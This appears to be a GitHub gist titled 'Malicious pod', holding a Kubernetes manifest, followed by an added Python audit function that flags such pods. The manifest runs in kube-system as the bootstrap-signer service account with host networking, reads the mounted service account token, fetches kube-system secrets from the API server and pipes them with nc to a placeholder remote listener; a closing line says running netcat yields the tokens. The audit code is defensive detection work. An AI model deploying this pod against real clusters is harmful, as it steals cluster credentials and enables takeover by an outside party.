@marcinguy
Last active August 19, 2019 14:53
Malicious pod
malicious-pod.yaml
::::::::::::::
apiVersion: v1
kind: Pod
metadata:
  name: alpine
  namespace: kube-system
spec:
  containers:
  - name: alpine
    image: alpine
    command: ["/bin/sh"]
    # Reads the mounted service account token, lists the kube-system secrets
    # through the API server, and pipes the response to a remote listener.
    args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://<masternode>:443/api/v1/namespaces/kube-system/secrets; } | nc -nv <somethingreachable> 6666; sleep 100000']
  # Runs as an existing kube-system service account with its token mounted.
  serviceAccountName: bootstrap-signer
  automountServiceAccountToken: true
  # Shares the node's network namespace.
  hostNetwork: true
Run netcat on <somethingreachable> and you get the tokens
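
A defender-side check for the traits this pod combines, as an added example that is not part of the original gist: it flags a Pod object that mounts the bootstrap-signer token in kube-system, sets hostNetwork, or reads the service account token in its command line. The function name, the finding IDs and the sensitive namespace and account lists are assumptions for illustration.

```python
SENSITIVE_NAMESPACES = {"kube-system"}             # assumption: tune per cluster
SENSITIVE_SERVICE_ACCOUNTS = {"bootstrap-signer"}  # assumption: extend with your own
TOKEN_MARKER = "secrets/kubernetes.io/serviceaccount/token"


def audit_pod(pod):
    """Return sorted finding IDs for one Pod dict (e.g. from `kubectl get pod -o json`)."""
    meta, spec = pod.get("metadata", {}), pod.get("spec", {})
    findings = set()

    sa = spec.get("serviceAccountName", "default")
    # Unset at pod level means the token is mounted unless the ServiceAccount
    # opts out, so only an explicit False is treated as safe here.
    mounted = spec.get("automountServiceAccountToken") is not False
    if (meta.get("namespace", "default") in SENSITIVE_NAMESPACES
            and sa in SENSITIVE_SERVICE_ACCOUNTS and mounted):
        findings.add("sensitive-sa-token-mounted")

    if spec.get("hostNetwork") is True:
        findings.add("host-network")

    for c in spec.get("containers", []) + spec.get("initContainers", []):
        argv = " ".join(c.get("command", []) + c.get("args", []))
        if TOKEN_MARKER in argv:
            findings.add("token-read-in-command")
    return sorted(findings)


# Constructed sample input: the pod above reduced to the audited fields, plus a benign pod.
SUSPECT = {
    "metadata": {"name": "alpine", "namespace": "kube-system"},
    "spec": {
        "serviceAccountName": "bootstrap-signer",
        "automountServiceAccountToken": True,
        "hostNetwork": True,
        "containers": [{"name": "alpine", "image": "alpine", "command": ["/bin/sh"],
                        "args": ["-c", "cat /run/secrets/kubernetes.io/serviceaccount/token"]}],
    },
}
BENIGN = {
    "metadata": {"name": "web", "namespace": "default"},
    "spec": {"automountServiceAccountToken": False,
             "containers": [{"name": "web", "image": "nginx"}]},
}

if __name__ == "__main__":
    for pod in (SUSPECT, BENIGN):
        print(pod["metadata"]["name"], audit_pod(pod))
```

The same function can be run over each item of `kubectl get pods -A -o json` output or over manifests in CI before they are applied.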